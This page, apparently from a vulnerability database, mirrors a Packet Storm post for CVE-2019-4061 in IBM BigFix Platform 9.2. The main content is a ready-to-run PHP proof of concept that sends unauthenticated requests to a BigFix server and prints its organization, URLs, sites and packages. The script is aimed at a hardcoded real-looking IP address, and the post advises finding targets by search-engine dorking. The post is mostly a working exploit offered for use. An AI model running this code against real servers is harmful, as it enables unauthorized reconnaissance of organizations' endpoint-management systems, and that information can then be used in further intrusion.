📄 IBM BigFix Platform 9.2 Information Disclosure

🗓️ 17 Dec 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 143 Views

IBM BigFix Platform 9.2 information disclosure vulnerability exposed via HTTP queries; PoC uses curl.

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2019-4061	20 Mar 201912:24	–	circl
CNVD	IBM BigFix Platform Unauthorized Access Vulnerability	25 Feb 201900:00	–	cnvd
CVE	CVE-2019-4061	27 Feb 201922:00	–	cve
Cvelist	CVE-2019-4061	27 Feb 201922:00	–	cvelist
Tenable Nessus	IBM BigFix Platform 9.2.x <= 9.2.16 / 9.5.x <= 9.5.11 Information Disclosure	3 May 201900:00	–	nessus
Nuclei	IBM BigFix Platform - Information Disclosure	5 Jun 202603:02	–	nuclei
NVD	CVE-2019-4061	27 Feb 201922:29	–	nvd
Packet Storm	IBM BigFix Relay Server Sites and Package Enum	31 Aug 202400:00	–	packetstorm
Prion	Design/Logic Flaw	27 Feb 201922:29	–	prion
Positive Technologies	PT-2019-16872 · Ibm · Ibm Bigfix Platform	27 Feb 201900:00	–	ptsecurity

=============================================================================================================================================
    | # Title     : IBM BigFix Platform 9.2 gather information Vulnerability                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://bigfix.com/                                                                                                         |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL. 
       
       (linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),
    	
    [+] save code as poc.php.
    
    [+] Set Target : line  68 
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class IBM_BigFix_Enum
    {
        private $targetUri;
        private $port;
        private $ssl;
    
        public function __construct($targetUri, $port = 52311, $ssl = true)
        {
            $this->targetUri = rtrim($targetUri, '/');
            $this->port = $port;
            $this->ssl = $ssl;
        }
    
        private function sendRequest($uri)
        {
            $url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . ":$this->port" . '/' . ltrim($uri, '/');
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        public function getMasthead()
        {
            $response = $this->sendRequest('masthead/masthead.axfm');
            if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {
                echo "Organization: " . htmlspecialchars($matches[1]) . "\n";
            }
            if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {
                foreach ($matches[1] as $url) {
                    echo "URL: " . htmlspecialchars($url) . "\n";
                }
            }
        }
    
        public function getSites()
        {
            $response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');
            if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {
                echo "Sites:\n";
                foreach ($matches[1] as $site) {
                    echo "- " . htmlspecialchars($site) . "\n";
                }
            }
        }
    
        public function getPackages()
        {
            $response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');
            if (!$response) {
                return;
            }
    
            echo "Packages:\n";
            if (preg_match_all('/url: (.*)/', $response, $matches)) {
                foreach ($matches[1] as $url) {
                    echo "- " . htmlspecialchars($url) . "\n";
                }
            }
        }
    }
    
    // تنفيذ الكود
    $bigFix = new IBM_BigFix_Enum('153.143.185.78');
    $bigFix->getMasthead();
    $bigFix->getSites();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

17 Dec 2025 00:00Current

6.7Medium risk

Vulners AI Score6.7

CVSS 25

CVSS 3.15.3

CVSS 35.3

EPSS0.74625